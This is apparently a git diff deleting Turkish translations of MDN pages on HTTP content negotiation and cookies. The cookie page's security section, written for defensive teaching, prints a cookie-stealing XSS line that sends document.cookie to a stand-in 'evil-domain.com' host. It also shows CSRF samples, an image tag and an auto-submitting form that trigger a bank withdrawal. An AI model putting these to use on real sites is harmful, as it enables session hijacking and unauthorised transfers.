diff options
Diffstat (limited to 'files/tr/web/http')
26 files changed, 0 insertions, 2867 deletions
diff --git a/files/tr/web/http/content_negotiation/index.html b/files/tr/web/http/content_negotiation/index.html deleted file mode 100644 index 9a12e443a3..0000000000 --- a/files/tr/web/http/content_negotiation/index.html +++ /dev/null @@ -1,141 +0,0 @@ ---- -title: İçerik görüşmesi -slug: Web/HTTP/Content_negotiation -translation_of: Web/HTTP/Content_negotiation ---- -<div>{{HTTPSidebar}}</div> - -<p class="summary"><a href="/tr/docs/Glossary/HTTP">HTTP</a> protokolünde, <em><strong>içerik görüşmesi</strong></em> bir kaynağın aynı URI'de farklı biçimlerini sunmak için kullanılan mekanizmadır, bu mekanizma sayesinde kullanıcının programı onun için bunların hangisinin daha uygun olacağını belirleyebilir (örneğin, bir dosyanın hangi dilinin, hangi resim formatının, ya da hangi içerik kodlamasının seçileceği gibi).</p> - -<h2 id="İçerik_görüşmesi_prensipleri">İçerik görüşmesi prensipleri</h2> - -<p>Belirli bir dosyaya <em>kaynak </em>denir. Bir istemci bu kaynağı elde etmek istediğinde, onun URL'sini kullanarak istekte bulunur. Sunucu bu URL'yi kullanarak bir varyantı seçer – her bir varyanta bir <em>temsil </em>denilir – ve istemciye bu belirli temsili döndürür. Kaynağın kendisinin, ve her bir temsilinin, belirli bir URL'si vardır. How a specific representation is chosen when the resource is called is determined by <em>content negotiation</em> and there are several ways of negotiating between the client and the server.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/13789/HTTPNego.png" style="height: 311px; width: 767px;"></p> - -<p>The determination of the best suited representation is made through one of two mechanisms:</p> - -<ul> - <li>Specific <a href="/tr/docs/Web/HTTP/Headers">HTTP headers</a> by the client (<em>server-driven negotiation</em> or <em>proactive negotiation</em>), which is the standard way of negotiating a specific kind of resource.</li> - <li>The {{HTTPStatus("300")}} (Multiple Choices) or {{HTTPStatus("406")}} (Not Acceptable) <a href="/tr/docs/Web/HTTP/Status">HTTP response codes</a> by the server (<em>agent-driven negotiation</em> or <em>reactive negotiation</em>), that are used as fallback mechanisms.</li> -</ul> - -<p>Over the years, other content negotiation proposals, like <em>transparent content negotiation</em> and the <code>Alternates</code> header, have been proposed. They failed to get traction and got abandoned.</p> - -<h2 id="Server-driven_content_negotiation">Server-driven content negotiation</h2> - -<p>In <em>server-driven content negotiation</em>, or proactive content negotiation, the browser (or any other kind of user-agent) sends several HTTP headers along with the URL. These headers describe the preferred choice of the user. The server uses them as hints and an internal algorithm chooses the best content to serve to the client. The algorithm is server-specific and not defined in the standard. See, for example, the <a class="external" href="http://httpd.apache.org/docs/2.2/en/content-negotiation.html#algorithm">Apache 2.2 negotiation algorithm</a>.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/13791/HTTPNegoServer.png" style="height: 380px; width: 767px;"></p> - -<p>The HTTP/1.1 standard defines list of the standard headers that start server-driven negotiation ({{HTTPHeader("Accept")}}, {{HTTPHeader("Accept-Charset")}}, {{HTTPHeader("Accept-Encoding")}}, {{HTTPHeader("Accept-Language")}}). Though strictly speaking {{HTTPHeader("User-Agent")}} is not in this list, it is sometimes also used to send a specific representation of the requested resource, though this is not considered as a good practice. The server uses the {{HTTPHeader("Vary")}} header to indicate which headers it actually used for content negotiation (or more precisely the associated response headers), so that <a href="/en-US/docs/Web/HTTP/Caching">caches</a> can work optimally.</p> - -<p>In addition to these, there is an experimental proposal to add more headers to the list of available headers, called <em>client hints</em>. Client hints advertise what kind of device the user agent runs on (for example, if it is a desktop computer or a mobile device).</p> - -<p>Even if server-driven content negotiation is the most common way to agree on a specific representation of a resource, it has several drawbacks:</p> - -<ul> - <li>The server doesn't have total knowledge of the browser. Even with the Client Hints extension, it has not a complete knowledge of the capabilities of the browser. Unlike reactive content negotiation where the client makes the choice, the server choice is always somewhat arbitrary.</li> - <li>The information by the client is quite verbose (HTTP/2 header compression mitigates this problem) and a privacy risk (HTTP fingerprinting)</li> - <li>As several representations of a given resource are sent, shared caches are less efficient and server implementations are more complex.</li> -</ul> - -<h3 id="The_Accept_header">The <code>Accept</code> header</h3> - -<p>The {{HTTPHeader("Accept")}} header lists the MIME types of media resources that the agent is willing to process. It is comma-separated lists of MIME types, each combined with a quality factor, a parameter indicating the relative degree of preference between the different MIME types.</p> - -<p>The {{HTTPHeader("Accept")}} header is defined by the browser, or any other user-agent, and can vary according to the context, like fetching an HTML page or an image, a video, or a script: It is different when fetching a document entered in the address bar or an element linked via an {{ HTMLElement("img") }}, {{ HTMLElement("video") }} or {{ HTMLElement("audio") }} element. Browsers are free to use the value of the header that they think is the most adequate; an exhaustive list of <a href="/en-US/docs/Web/HTTP/Content_negotiation/List_of_default_Accept_values">default values for common browsers</a> is available.</p> - -<h3 id="The_Accept-CH_header_experimental_inline">The <code>Accept-CH</code> header {{experimental_inline}}</h3> - -<div class="note"> -<p>This is part of an <strong>experimental</strong> technology called <em>Client Hints</em>. Initial support is in Chrome 46 or later. The Device-Memory value is in Chrome 61 or later.</p> -</div> - -<p>The experimental {{HTTPHeader("Accept-CH")}} lists configuration data that can be used by the server to select an appropriate response. Valid values are:</p> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Value</th> - <th scope="col">Meaning</th> - </tr> - </thead> - <tbody> - <tr> - <td><code>Device-Memory</code></td> - <td>Indicates the approximate amount of device RAM. This value is an approximation given by rounding to the nearest power of 2 and dividing that number by 1024. For example, 512 megabytes will be reported as <code>0.5</code>. </td> - </tr> - <tr> - <td><code>DPR</code></td> - <td>Indicates the client's device pixel ratio.</td> - </tr> - <tr> - <td><code>Viewport-Width</code></td> - <td>Indicates the layout viewport width in CSS pixels. </td> - </tr> - <tr> - <td><code>Width</code></td> - <td>Indicates the resource width in physical pixels (in other words the intrinsic size of an image).</td> - </tr> - </tbody> -</table> - -<h3 id="The_Accept-Charset_header">The <code>Accept-Charset</code> header</h3> - -<p>The {{HTTPHeader("Accept-Charset")}} header indicates to the server what kinds of character encodings are understood by the user-agent. Traditionally, it was set to a different value for each locale for the browser, like <code>ISO-8859-1,utf-8;q=0.7,*;q=0.7</code> for a Western European locale.</p> - -<p>With UTF-8 now being well-supported, being the preferred way of encoding characters, <a href="https://www.eff.org/deeplinks/2010/01/primer-information-theory-and-privacy">and to guarantee better privacy through less configuration-based entropy</a>, browsers omit the <code>Accept-Charset</code> header: Internet Explorer 8, Safari 5, Opera 11, Firefox 10 and Chrome 27 have abandoned this header.</p> - -<h3 id="The_Accept-CH-Lifetime_header">The <code>Accept-CH-Lifetime</code> header</h3> - -<div class="note"> -<p>This is part of an <strong>experimental</strong> technology called <em>Client Hints </em> and is only available in Chrome 61 or later.</p> -</div> - -<p>The {{HTTPHeader("Accept-CH-Lifetime")}} header is used with the <code>Device-Memory</code> value of the <code>Accept-CH</code> header and indicates the amount of time the device should opt-in to sharing the amount of device memory with the server. The value is given in miliseconds and it's use is optional.</p> - -<h3 id="The_Accept-Encoding_header">The <code>Accept-Encoding</code> header</h3> - -<p>The {{HTTPHeader("Accept-Encoding")}} header defines the acceptable content-encoding (supported compressions). The value is a q-factor list (e.g.: <code>br, gzip;q=0.8</code>) that indicates the priority of the encoding values. The default value <code>identity</code> is at the lowest priority (unless otherwise declared).</p> - -<p>Compressing HTTP messages is one of the most important ways to improve the performance of a Web site, it shrinks the size of the data transmitted and makes better use of the available bandwidth; browsers always send this header and the server should be configured to abide to it and to use compression.</p> - -<h3 id="The_Accept-Language_header">The <code>Accept-Language</code> header</h3> - -<p>The {{HTTPHeader("Accept-Language")}} header is used to indicate the language preference of the user. It is a list of values with quality factors (like: <code>"de, en;q=0.7</code>"). A default value is often set according the language of the graphical interface of the user agent, but most browsers allow to set different language preferences.</p> - -<p>Due to the <a href="https://www.eff.org/deeplinks/2010/01/primer-information-theory-and-privacy">configuration-based entropy</a> increase, a modified value can be used to fingerprint the user, it is not recommended to change it and a Web site cannot trust this value to reflect the actual wish of the user. Site designers must not be over-zealous by using language detection via this header as it can lead to a poor user experience:</p> - -<ul> - <li>They should always provide a way to overcome the server-chosen language, e.g., by providing a language menu on the site. Most user-agents provide a default value for the <code>Accept-Language</code> header, adapted to the user interface language and end users often do not modify it, either by not knowing how, or by not being able to do it, as in an Internet café for instance.</li> - <li>Once a user has overridden the server-chosen language, a site should no longer use language detection and should stick with the explicitly-chosen language. In other words, only entry pages of a site should select the proper language using this header.</li> -</ul> - -<h3 id="The_User-Agent_header">The <code>User-Agent</code> header</h3> - -<div class="note"> -<p>Though there are legitimate uses of this header for selecting content, <a href="/en-US/docs/Web/HTTP/Browser_detection_using_the_user_agent">it is considered bad practice</a> to rely on it to define what features are supported by the user agent.</p> -</div> - -<p>The {{HTTPHeader("User-Agent")}} header identifies the browser sending the request. This string may contain a space-separated list of <em>product tokens</em> and <em>comments</em>.</p> - -<p>A <em>product token</em> is a name followed by a '<code>/</code>' and a version number, like <code>Firefox/4.0.1</code>. There may be as many of them as the user-agent wants. A <em>comment</em> is a free string delimited by parentheses. Obviously parentheses cannot be used in that string. The inner format of a comment is not defined by the standard, though several browser put several tokens in it, separated by '<code>;</code>'.</p> - -<h3 id="The_Vary_response_header">The <code>Vary</code> response header</h3> - -<p>In opposition to the previous <code>Accept-*</code> headers which are sent by the client, the {{HTTPHeader("Vary")}} HTTP header is sent by the web server in its response. It indicates the list of headers used by the server during the server-driven content negotiation phase. The header is needed in order to inform the cache of the decision criteria so that it can reproduce it, allowing the cache to be functional while preventing serving erroneous content to the user.</p> - -<p>The special value of '<code>*</code>' means that the server-driven content negotiation also uses information not conveyed in a header to choose the appropriate content.</p> - -<p>The <code>Vary</code> header was added in the version 1.1 of HTTP and is necessary in order to allow caches to work appropriately. A cache, in order to work with server-driven content negotiation, needs to know which criteria was used by the server to select the transmitted content. That way, the cache can replay the algorithm and will be able to serve acceptable content directly, without more request to the server. Obviously, the wildcard '<code>*</code>' prevents caching from occurring, as the cache cannot know what element is behind it.</p> - -<h2 id="Agent-driven_negotiation">Agent-driven negotiation</h2> - -<p>Server-driven negotiation suffers from a few downsides: it doesn't scale well. There is one header per feature used in the negotiation. If you want to use screen size, resolution or other dimensions, a new HTTP header must be created. Sending of the headers must be done on every request. This is not too problematic with few headers, but with the eventual multiplications of them, the message size would lead to a decrease in performance. The more precise headers are sent, the more entropy is sent, allowing for more HTTP fingerprinting and corresponding privacy concern.</p> - -<p>From the beginnings of HTTP, the protocol allowed another negotiation type: <em>agent-driven negotiation</em> or <em>reactive negotiation</em>. In this negotiation, when facing an ambiguous request, the server sends back a page containing links to the available alternative resources. The user is presented the resources and choose the one to use.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/13795/HTTPNego3.png"></p> - -<p>Unfortunately, the HTTP standard does not specify the format of the page allowing to choose between the available resource, which prevents to easily automatize the process. Besides falling back to the <em>server-driven negotiation</em>, this method is almost always used in conjunction with scripting, especially with JavaScript redirection: after having checked for the negotiation criteria, the script performs the redirection. A second problem is that one more request is needed in order to fetch the real resource, slowing the availability of the resource to the user.</p> diff --git a/files/tr/web/http/cookies/index.html b/files/tr/web/http/cookies/index.html deleted file mode 100644 index b815de758d..0000000000 --- a/files/tr/web/http/cookies/index.html +++ /dev/null @@ -1,251 +0,0 @@ ---- -title: HTTP çerezleri -slug: Web/HTTP/Cookies -tags: - - HTTP - - Sunucu - - Tarayıcı - - Çerezler -translation_of: Web/HTTP/Cookies ---- -<div>{{HTTPSidebar}}</div> - -<p class="summary"><span class="seoSummary"><dfn>HTTP çerezi</dfn> (web çerezi, tarayıcı çerezi), bir sunucunun kullanıcının web tarayıcısına gönderdiği küçük bir veri parçasıdır. Tarayıcı bunu saklayabilir ve bir sonraki istekle aynı sunucuya geri gönderebilir.</span> <span class="tlid-translation translation" lang="tr">Genellikle, iki ayrı isteğin aynı tarayıcıdan gelip gelmediğini anlamak için kullanılır - örneğin bir kullanıcının giriş yapmış olarak kalması gibi. HTTP protokolü durumsuz (</span><a href="/en-US/docs/Web/HTTP/Overview#HTTP_is_stateless_but_not_sessionless">stateless</a><span class="tlid-translation translation" lang="tr">) olduğu için çerez durum bilgisini hatırlar.</span></p> - -<p>Çerezler temel olarak üç amaç için kullanılır:</p> - -<dl> - <dt>Oturum yönetimi</dt> - <dd><span class="tlid-translation translation" lang="tr">Girişler, alışveriş sepetleri, oyun puanları veya sunucunun hatırlaması gereken diğer şeyler</span></dd> - <dt><span class="tlid-translation translation" lang="tr">Kişiselleştirme</span></dt> - <dd><span class="tlid-translation translation" lang="tr">Kullanıcı tercihleri, temalar ve diğer ayarlar</span></dd> - <dt><span class="tlid-translation translation" lang="tr">Takip etme</span></dt> - <dd><span class="tlid-translation translation" lang="tr">Kullanıcı davranışını kaydetme ve analiz etme</span></dd> -</dl> - -<p><span class="tlid-translation translation" lang="tr">Çerezler eskiden genel istemci tarafında depolama amaçlı kullanılmıştır. O zamanlar istemcide veri depolamanın tek yolu bu olduğundan çerez kullanımı mantıklı idi; ancak günümüzde modern depolama API'lerini tercih etmeleri önerilir. Çerezler her istekle birlikte gönderilir, bu yüzden performansı düşürebilirler (özellikle mobil veri bağlantıları için). İstemci depolaması için kullanılan modern API'ler </span><a href="/en-US/docs/Web/API/Web_Storage_API" title="DOM Storage">Web storage API</a> (<code>localStorage</code> ve <code>sessionStorage</code>) ve <a href="/en-US/docs/Web/API/IndexedDB_API">IndexedDB</a><span class="tlid-translation translation" lang="tr">'dir.</span></p> - -<div class="note"> -<p><span class="tlid-translation translation" lang="tr">Depolanmış çerezleri (ve bir web sayfasının kullanabileceği diğer depoları) görmek için, Geliştirici Araçları'nda Depolama Denetçisi'ni (</span><a href="/en-US/docs/Tools/Storage_Inspector">Storage Inspector</a><span class="tlid-translation translation" lang="tr">) etkinleştirebilir ve depolama ağacından Çerezler'i seçebilirsiniz.</span></p> -</div> - -<h2 id="Çerez_oluşturma"><span class="tlid-translation translation" lang="tr">Çerez oluşturma</span></h2> - -<p><span class="tlid-translation translation" lang="tr">Bir HTTP isteği aldığında, sunucu yanıtla beraber bir {{HTTPHeader ("Set-Cookie")}} başlığı gönderebilir. Bu çerez genellikle tarayıcı tarafından depolanır ve daha sonra aynı sunucuya yapılan isteklerde {{HTTPHeader ("Cookie")}} HTTP başlığı içinde gönderilir. Son kullanma tarihi veya kullanım süresi tanımlanabilir, bu süre bitiminde artık çerez gönderilmez. Buna ilaveten, çerezin gönderildiği yeri sınırlayacak belirli bir alan(domain) ve yol(path) için kısıtlamalar konulabilir.</span></p> - -<h3 id="Set-Cookie_ve_Cookie_başlıkları"><code>Set-Cookie</code> ve <code>Cookie</code> başlıkları</h3> - -<p>The {{HTTPHeader("Set-Cookie")}} HTTP yanıt başlığı,<span class="tlid-translation translation" lang="tr"> sunucudan kullanıcı programa çerezleri gönderir. Basit bir çerez şöyle ayarlanır:</span> :</p> - -<pre class="syntaxbox">Set-Cookie: <cookie-adı>=<cookie-değeri></pre> - -<p><span class="tlid-translation translation" lang="tr">Sunucudan gelen bu başlık istemciye bir çerezi kaydetmesini söyler.</span></p> - -<div class="note"><strong>Not:</strong> <code>Set-Cookie</code><span class="tlid-translation translation" lang="tr"> başlığı çeşitli sunucu tarafı uygulamalarda şöyle kullanılır</span>: - -<ul> - <li><a href="https://secure.php.net/manual/en/function.setcookie.php">PHP</a></li> - <li><a href="https://nodejs.org/dist/latest-v8.x/docs/api/http.html#http_response_setheader_name_value">Node.JS</a></li> - <li><a href="https://docs.python.org/3/library/http.cookies.html">Python</a></li> - <li><a href="https://api.rubyonrails.org/classes/ActionDispatch/Cookies.html">Ruby on Rails</a></li> -</ul> -</div> - -<pre>HTTP/2.0 200 OK -Content-type: text/html -Set-Cookie: skor=75 -Set-Cookie: tema=dark - -[page content]</pre> - -<p id="The_client_sends_back_to_the_server_its_cookies_previously_stored"><span class="tlid-translation translation" lang="tr">Artık tarayıcı sunucuya yaptığı her yeni istekte daha önce kaydetmiş olduğu tüm çerezleri {{HTTPHeader ("Cookie")}} başlığını kullanarak geri gönderir.</span></p> - -<pre>GET /sample_page.html HTTP/2.0 -Host: www.example.org -Cookie: skor=75; tema=dark</pre> - -<h3 id="Oturum_çerezleri">Oturum çerezleri</h3> - -<p><span class="tlid-translation translation" lang="tr">Yukarıda oluşturulan çerez bir <em>oturum çerezidir</em>: istemci kapandığında silinir, çünkü bir </span><code>Expires</code> veya <code>Max-Age</code><span class="tlid-translation translation" lang="tr"> direktifi belirtmemiştir. Ancak web tarayıcıları <strong>oturum canlandırma (</strong></span><strong>session restoring</strong><span class="tlid-translation translation" lang="tr"><strong>)</strong> özelliğini kullanarak çoğu oturum çerezini sanki tarayıcı hiç kapatılmamış gibi kalıcı yapabilirler.</span></p> - -<h3 id="Kalıcı_çerezler">Kalıcı çerezler</h3> - -<p><em>K</em><span class="tlid-translation translation" lang="tr"><em>alıcı çerezler</em>, </span>istemci <span class="tlid-translation translation" lang="tr">kapandığında zaman aşımına uğramak yerine, belirli bir tarihte </span>(<code>Expires</code>)<span class="tlid-translation translation" lang="tr"> veya belirli bir süre sonra </span>(<code>Max-Age</code>)<span class="tlid-translation translation" lang="tr"> kullanımdan kalkar.</span></p> - -<pre>Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT;</pre> - -<div class="note"> -<p><strong>Not</strong>: <span class="tlid-translation translation" lang="tr">Son kullanma tarihi belirtildiğinde, saat ve tarih sunucuya göre değil, çerezi tanımlayan istemciye göre ayarlanır.</span></p> -</div> - -<h3 id="Secure_ve_HttpOnly_çerezleri"><code>Secure</code> ve <code>HttpOnly</code> çerezleri</h3> - -<p><span class="tlid-translation translation" lang="tr">Güvenli bir çerez, sunucuya yalnızca HTTPS protokolü üzerinden şifrelenmiş bir istekle gönderilebilir. </span><code>Secure</code><span class="tlid-translation translation" lang="tr"> bayrağı bile olsa, hassas bilgiler <em>asla </em>çerezlerde saklanmamalıdır; çünkü çerezler doğası gereği güvenli değildir ve bu bayrak gerçek bir koruma sağlayamaz. Chrome 52 ve Firefox 52'den itibaren, güvensiz siteler </span>(<code>http:</code>) <code>Secure</code> direktifi <span class="tlid-translation translation" lang="tr">ile çerezleri ayarlayamamaktadır.</span></p> - -<p><span class="tlid-translation translation" lang="tr">Siteler arası komut dosyası çalıştırma ({{Glossary ("XSS")}}) saldırılarını önlemek için, </span><code>HttpOnly</code><span class="tlid-translation translation" lang="tr"> çerezlerine JavaScript'in {{domxref ("Document.cookie")}} API'sinden erişilemez; bu çerezler sadece sunucuya gönderilir. Örneğin, sunucu tarafı oturumlarını devam ettiren çerezlerin JavaScript'ten erşilebilir olması gerekmez, ve bunlarda </span><code>HttpOnly</code> <span class="tlid-translation translation" lang="tr">bayrağı ayarlanmalıdır.</span></p> - -<pre>Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly</pre> - -<h3 id="Çerezlerin_kapsamı"><span class="tlid-translation translation" lang="tr">Çerezlerin kapsamı</span></h3> - -<p><code>Domain</code> ve <code>Path</code> direktifleri<span class="tlid-translation translation" lang="tr"> çerezin <em>kapsamını </em>yani hangi URL'lere gönderilmesi gerektiğini </span>tanımlar.</p> - -<p><code>Domain</code> <span class="tlid-translation translation" lang="tr">çerezlerin alınmasına izin verilen ana bilgisayarları(host) belirtir. Eğer belirtilmemişse varsayılan değeri <strong>alt alanlar hariç</strong> şu anki belge konumundaki ana bilgisayardır (</span><a href="/en-US/docs/Web/API/Document/location">host of the current document location</a><span class="tlid-translation translation" lang="tr">). Eğer </span><code>Domain</code><span class="tlid-translation translation" lang="tr"> <em>belirtilmişse</em>, alt alanlar her zaman dahil edilir.</span></p> - -<p><span class="tlid-translation translation" lang="tr">Örneğin, </span><code>Domain=mozilla.org</code><span class="tlid-translation translation" lang="tr"> belirtilmişse, çerezler </span><code>developer.mozilla.org</code><span class="tlid-translation translation" lang="tr"> gibi alt alanlarda dahil edilir.</span></p> - -<p><code>Path</code><span class="tlid-translation translation" lang="tr">, </span><code>Cookie</code><span class="tlid-translation translation" lang="tr"> başlığını gönderebilmek için istenen URL'de bulunması gereken URL yolunu gösterir. %X2F ("/") karakteri dizin ayırıcı olarak kabul edilir ve alt dizinler de eşleşir.</span></p> - -<p><span class="tlid-translation translation" lang="tr">Örneğin, </span><code>Path=/docs</code> <span class="tlid-translation translation" lang="tr">belirtilmişse, şu yollar eşleşecektir:</span></p> - -<ul> - <li><code>/docs</code></li> - <li><code>/docs/Web/</code></li> - <li><code>/docs/Web/HTTP</code></li> -</ul> - -<h3 id="SameSite_çerezleri_experimental_inline"><code>SameSite</code> çerezleri {{experimental_inline}}</h3> - -<p><code>SameSite</code> çerezleri,<span class="tlid-translation translation" lang="tr"> sunucuların siteler arası yapılan isteklerde (buradaki </span>{{Glossary("Site")}}<span class="tlid-translation translation" lang="tr"> tescilli etki alanı tarafından tanımlıdır) çerez gönderimini engellemesini sağlar, bu da siteler arası sahtecilik saldırılarına </span>({{Glossary("CSRF")}})<span class="tlid-translation translation" lang="tr"> karşı bir miktar koruma sağlar.</span></p> - -<p><code>SameSite</code><span class="tlid-translation translation" lang="tr"> çerezleri nispeten yenidir ve <a href="/en-US/docs/Web/HTTP/headers/Set-Cookie#Browser_compatibility">tüm büyük tarayıcılar tarafından desteklenmektedir</a>.</span></p> - -<p>Örnek:</p> - -<pre>Set-Cookie: key=value; SameSite=Strict</pre> - -<p>SameSite<span class="tlid-translation translation" lang="tr"> özelliği şu iki değerden birini alabilir (büyük/küçük harf duyarlı değil):</span></p> - -<dl> - <dt><code>Strict</code></dt> - <dd><span class="tlid-translation translation" lang="tr">Same-site çerezi bu özelliğe sahipse, tarayıcı yalnızca istek çerezleri oluşturan web sitesinden geldiğinde çerezleri gönderir. Eğer istek şu anki konumun URL’sinden farklı bir URL’den geldiyse, </span><code>Strict</code><span class="tlid-translation translation" lang="tr"> özelliği ile etiketlenen çerezlerin hiçbiri isteğe dahil edilmez.</span></dd> - <dt><code>Lax</code></dt> - <dd>Same-site değeri <span class="tlid-translation translation" lang="tr">Lax olarak ayarlanmışsa, resim veya frame yüklemek için yapılan aramalar gibi siteler arası alt isteklerde same-site çerezleri bekletilir; ancak kullanıcı URL’ye harici bir siteden, örneğin bir bağlantıyı takip ederek gelmişse gönderilir.</span></dd> -</dl> - -<p><span class="tlid-translation translation" lang="tr">Bayrak belirtilmemişse veya tarayıcı tarafından desteklenmiyorsa, varsayılan davranış, çerezleri farklı kaynaklı istekler (cross-origin requests) de dahil her isteğe dahil etmektir.</span></p> - -<h3 id="Cookie_önekleri_experimental_inline">Cookie önekleri {{experimental_inline}}</h3> - -<p>The design of the cookie mechanism is such that a server is unable to confirm a cookie was set on a secure origin or indeed, tell <em>where</em> a cookie was originally set. Recall that a subdomain such as <code>application.example.com</code> can set a cookie that will be sent with requests to <code>example.com</code> or other sub-domains by setting the <em>Domain</em> attribute:</p> - -<pre class="syntaxbox">Set-Cookie: CSRF=e8b667; Secure; Domain=example.com</pre> - -<p>If a vulnerable application is available on a sub-domain, this mechanism can be abused in a <em>session fixation</em> attack. When the user visits a page on the parent domain (or another subdomain), the application may trust the existing value sent in the user's cookie. This could allow an attacker to bypass CSRF protection or hijack a session after the user logs in.</p> - -<p>Alternatively, if the parent domain does not use {{Glossary("HSTS")}} with <code>includeSubdomains</code> set, a user subject to an active MitM (perhaps connected to an open WiFi network) could be served a response with a {{HTTPHeader("Set-Cookie")}} header from a non-existent sub-domain. The end result would be much the same, with the browser storing the illegitimate cookie and sending it to all other pages under <code>example.com</code>.</p> - -<p>Session fixation should primarily be mitigated by regenerating session cookie values when the user authenticates (even if a cookie already exists) and by tieing any CSRF token to the user. As a defence in depth measure, however, it is possible to use <em>cookie prefixes</em> to assert specific facts about the cookie. Two prefixes are available:</p> - -<dl> - <dt><code>__Host-</code></dt> - <dd>If a cookie name has this prefix, it will only be accepted in a {{HTTPHeader("Set-Cookie")}} directive if it is marked <code>Secure</code>, does <em>not</em> include a <code>Domain</code> attribute and was sent from a secure origin. In this way, these cookies can be seen as "domain-locked".</dd> - <dt><code>__Secure-</code></dt> - <dd>If a cookie name has this prefix, it will only be accepted in a {{HTTPHeader("Set-Cookie")}} directive if it is marked <code>Secure</code> and was sent from a secure origin. This is weaker than the <code>__Host-</code> prefix.</dd> -</dl> - -<p>Cookies sent which are not compliant will be rejected by the browser. Note that this ensures that if a sub-domain were to create a cookie with this name, it would be either be confined to the sub-domain or ignored completely. As the application server will only check for a specific cookie name when determining if the user is authenticated or a CSRF token is correct, this effectively acts as a defence measure against session fixation.</p> - -<div class="note"> -<p>On the application server, the web application <em>must</em> check for the full cookie name including the prefix—user agents <em>will not</em> strip the prefix from the cookie before sending it in a request's {{HTTPHeader("Cookie")}} header.</p> -</div> - -<p>For more information about cookie prefixes and the current state of browser support, see the <a href="/en-US/docs/Web/HTTP/Headers/Set-Cookie#Cookie_prefixes">Set-Cookie section</a>.</p> - -<h3 id="JavaScript_access_using_Document.cookie">JavaScript access using <code>Document.cookie</code></h3> - -<p>New cookies can also be created via JavaScript using the {{domxref("Document.cookie")}} property, and if the <code>HttpOnly</code> flag is not set, existing cookies can be accessed from JavaScript as well.</p> - -<pre class="brush: js">document.cookie = "yummy_cookie=choco"; -document.cookie = "tasty_cookie=strawberry"; -console.log(document.cookie); -// logs "yummy_cookie=choco; tasty_cookie=strawberry"</pre> - -<p>Cookies created via JavaScript cannot include the <code>HttpOnly</code> flag.</p> - -<p>Please note the security issues in the <a href="/en-US/docs/Web/HTTP/Cookies#Security">Security</a> section below. Cookies available to JavaScript can be stolen through XSS.</p> - -<h2 id="Security">Security</h2> - -<div class="note"> -<p>Information should be stored in cookies with the understanding that all cookie values will be visible to and can be changed by the end-user. Depending on the application, it may be desirable to use an opaque identifier which is looked-up server-side or investigate alternative authentication/confidentiality mechanisms such as JSON Web Tokens.</p> -</div> - -<h3 id="Session_hijacking_and_XSS">Session hijacking and XSS</h3> - -<p>Cookies are often used in web application to identify a user and their authenticated session, so stealing a cookie can lead to hijacking the authenticated user's session. Common ways to steal cookies include Social Engineering or exploiting an {{Glossary("XSS")}} vulnerability in the application.</p> - -<pre class="brush: js">(new Image()).src = "http://www.evil-domain.com/steal-cookie?cookie=" + document.cookie;</pre> - -<p>The <code>HttpOnly</code> cookie attribute can help to mitigate this attack by preventing access to cookie value through JavaScript. Exfiltration avenues can be limited by deploying a strict <a href="/en-US/docs/Web/HTTP/CSP">Content-Security-Policy</a>.</p> - -<h3 id="Cross-site_request_forgery_(CSRF)">Cross-site request forgery (CSRF)</h3> - -<p><a href="https://en.wikipedia.org/wiki/HTTP_cookie#Cross-site_request_forgery">Wikipedia</a> mentions a good example for {{Glossary("CSRF")}}. In this situation, someone includes an image that isn’t really an image (for example in an unfiltered chat or forum), instead it really is a request to your bank’s server to withdraw money:</p> - -<pre class="brush: html"><img src="https://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory"></pre> - -<p>Now, if you are logged into your bank account and your cookies are still valid (and there is no other validation), you will transfer money as soon as you load the HTML that contains this image. For endpoints that require a POST request, it's possible to programmatically trigger a <code><form></code> submit (perhaps in an invisible <code><iframe></code>) when the page is loaded:</p> - -<pre class="brush: html"><form action="https://bank.example.com/withdraw" method="POST"> - <input type="hidden" name="account" value="bob"> - <input type="hidden" name="amount" value="1000000"> - <input type="hidden" name="for" value="mallory"> -</form> -<script>window.addEventListener('DOMContentLoaded', (e) => { document.querySelector('form').submit(); }</script> -</pre> - -<p>There are a few techniques that should be used to prevent this from happening:</p> - -<ul> - <li>GET endpoints should be idempotent—actions that enact a <em>change </em>and do not simply retrieve data should require sending a POST (or other HTTP method) request. POST endpoints should not interchangeably accept GET requests with parameters in the query string.</li> - <li>A CSRF token should be included in <code><form></code> elements via a hidden input field. This token should be unique per user and stored (for example, in a cookie) such that the server can look up the expected value when the request is sent. For all non-GET requests that have the potential to perform an action, this input field should be compared against the expected value. If there is a mismatch, the request should be aborted. - <ul> - <li>This method of protection relies on an attacker being unable to predict the user's assigned CSRF token. The token should be regenerated on sign-in.</li> - </ul> - </li> - <li>Cookies that are used for sensitive actions (such as session cookies) should have a short lifetime with the SameSite attribute set to <code>Strict</code> or <code>Lax</code>. (See <a href="/en-US/docs/Web/HTTP/Cookies#SameSite_cookies">SameSite cookies</a> above). In supporting browsers, this will have the effect of ensuring that the session cookie is <em>not</em> sent along with cross-site requests and so the request is effectively unauthenticated to the application server.</li> - <li>Both CSRF tokens and SameSite cookies should be deployed. This ensures all browsers are protected and provides protection where SameSite cookies cannot help (such as attacks originating from a separate subdomain).</li> - <li>For more prevention tips, see the <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet">OWASP CSRF prevention cheat sheet</a>.</li> -</ul> - -<h2 id="Tracking_and_privacy">Tracking and privacy</h2> - -<h3 id="Third-party_cookies">Third-party cookies</h3> - -<p>Cookies have a domain associated to them. If this domain is the same as the domain of the page you are on, the cookies is said to be a <em>first-party cookie</em>. If the domain is different, it is said to be a <em>third-party cookie</em>. While first-party cookies are sent only to the server setting them, a web page may contain images or other components stored on servers in other domains (like ad banners). Cookies that are sent through these third-party components are called third-party cookies and are mainly used for advertising and tracking across the web. See for example the <a href="https://www.google.com/policies/technologies/types/">types of cookies used by Google</a>. Most browsers allow third-party cookies by default, but there are add-ons available to block them (for example, <a href="https://addons.mozilla.org/en-US/firefox/addon/privacy-badger-firefox/">Privacy Badger</a> by the <a href="https://www.eff.org/">EFF</a>).</p> - -<p>If you are not disclosing third-party cookies, consumer trust might get harmed if cookie use is discovered. A clear disclosure (such as in a privacy policy) tends to eliminate any negative effects of a cookie discovery. Some countries also have legislation about cookies. See for example Wikimedia Foundation's <a 